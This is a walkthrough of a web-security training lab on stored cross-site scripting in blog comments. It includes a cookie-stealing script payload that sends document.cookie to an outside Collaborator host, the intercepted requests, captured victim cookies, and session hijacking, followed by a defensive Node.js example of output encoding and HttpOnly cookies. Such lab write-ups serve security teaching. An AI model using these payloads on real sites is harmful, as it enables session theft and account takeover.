Exploiting cross site scripting to steal cookies

Description

This lab contains a stored XSS vulnerability in the blog comments function. A simulated victim user views all comments after they are posted. To solve the lab, exploit the vulnerability to exfiltrate the victim's session cookie, then use this cookie to impersonate the victim.

Approach

After accessing the lab, I went straight to the comment section and intercepted a request for writing a comment. I started by injecting some HTML tags into all the parameters to see if they would be reflected and executed.

Here is the initial request I tested:

POST /post/comment HTTP/2
Host: 0ac0006b031dd3e58149805400aa0035.web-security-academy.net
Cookie: session=yDz4qBe80MaMP1NdoROJ3AqhkYLFAcki
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
...

csrf=hbrtk78h7GPkN9RvkL7fTu7A1hnHy5Ff&postId=9&comment=<b>hacked</b>&name=<b>hacked</b>&email=<b>hacked</b>%40qwe.com&website=http%3A%2F%2FInconsistent.com

The HTML tags were rendered correctly in the comment section, indicating that the input wasn't sanitized and the parameter was vulnerable to Cross-Site Scripting (XSS).

Next, I injected a malicious script to steal the cookie of anyone who views my comment and send it back to me via Burp Collaborator. The payload I used was:

<script>fetch('http://collaborator_payload/?cookie=' + document.cookie);</script>

Here is how my request looked after URL encoding the payload:

POST /post/comment HTTP/2
Host: 0ac0006b031dd3e58149805400aa0035.web-security-academy.net
Cookie: session=yDz4qBe80MaMP1NdoROJ3AqhkYLFAcki
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
...

csrf=hbrtk78h7GPkN9RvkL7fTu7A1hnHy5Ff&postId=9&comment=<script>fetch('http%3a//orjh9pyr6vnqwpy9yx2veooyhpngbhz6.oastify.com/%3fcookie%3d'+%2b+document.cookie)%3b</script>&name=ichyaboy&email=qwe%40qwe.com&website=http://hacker.com

After submitting the comment, I went to the Burp Collaborator tab and clicked Poll now. I saw some requests and, on checking one of the HTTP requests, clicked Request to Collaborator to view the details. I found the following request:

GET /?cookie=secret=BRVt9vEFnSygDFObRWIvLWhxIoPZDzV3;%20session=09lYgD4mdNhT2scAbn2iYil8SvxSckhJ HTTP/1.1
Host: o7whppermv3qcpe9exivuo4yxp3grafz.oastify.com
...

This request contained the victim's cookies. By going to the home page, pressing F12 to open the developer tools, navigating to the storage tab, and then to cookies, I replaced the value of my current session cookie with the victim's session cookie. After reloading the page, I was logged in as the administrator. This solved the lab.
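From the defender's side, the root cause of this lab is twofold: the comment handler wrote user-supplied fields into the page without HTML encoding, and the session cookie was readable from script, so `document.cookie` handed it to the payload. The following Node.js snippet is an added example, not code from the lab or from this write-up; the field names (comment, name, email, website) follow the lab's form and the cookie name `session` comes from the requests above, everything else (function names, markup layout) is assumed.

```javascript
// Added defensive example (not part of the lab or the write-up): the two
// server-side fixes that would have stopped this attack, written for Node.js.
// 1) Encode every user-supplied field before it is placed into comment HTML.
// 2) Issue the session cookie with HttpOnly so document.cookie cannot read it.
// Field names (comment, name, email, website) follow the lab's comment form.

const ENTITY_MAP = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

// Escape the five characters that can break out of an HTML text or attribute context.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ENTITY_MAP[ch]);
}

// The website field lands in an href, where encoding alone is not enough:
// a javascript: URL is harmless as text but runs on click. Allow only http(s).
function safeHref(url) {
  try {
    const parsed = new URL(String(url));
    return parsed.protocol === 'http:' || parsed.protocol === 'https:' ? parsed.href : null;
  } catch {
    return null; // not a parseable URL at all
  }
}

// Build the comment markup the way a hardened comment handler would (assumed layout).
function renderComment({ comment, name, email, website }) {
  const href = safeHref(website);
  const author = href
    ? `<a href="${escapeHtml(href)}">${escapeHtml(name)}</a>`
    : escapeHtml(name);
  return `<section class="comment"><p>${author} (${escapeHtml(email)})</p>` +
    `<p>${escapeHtml(comment)}</p></section>`;
}

// Set-Cookie value for the session: HttpOnly keeps it out of document.cookie,
// Secure and SameSite=Lax limit where the browser will send it.
function sessionCookieHeader(value) {
  return `session=${encodeURIComponent(value)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Constructed sample input: the payload shape from the write-up with a placeholder host.
const hostile = {
  comment: "<script>fetch('http://PLACEHOLDER.example/?cookie=' + document.cookie);</script>",
  name: '<b>hacked</b>',
  email: 'hacked@qwe.com',
  website: 'javascript:alert(1)',
};
```

Run through `renderComment`, the payload is displayed as literal text rather than executed, the `javascript:` website is dropped from the link, and with the cookie issued as `HttpOnly` the `document.cookie` read in the payload would not have included `session` in the first place.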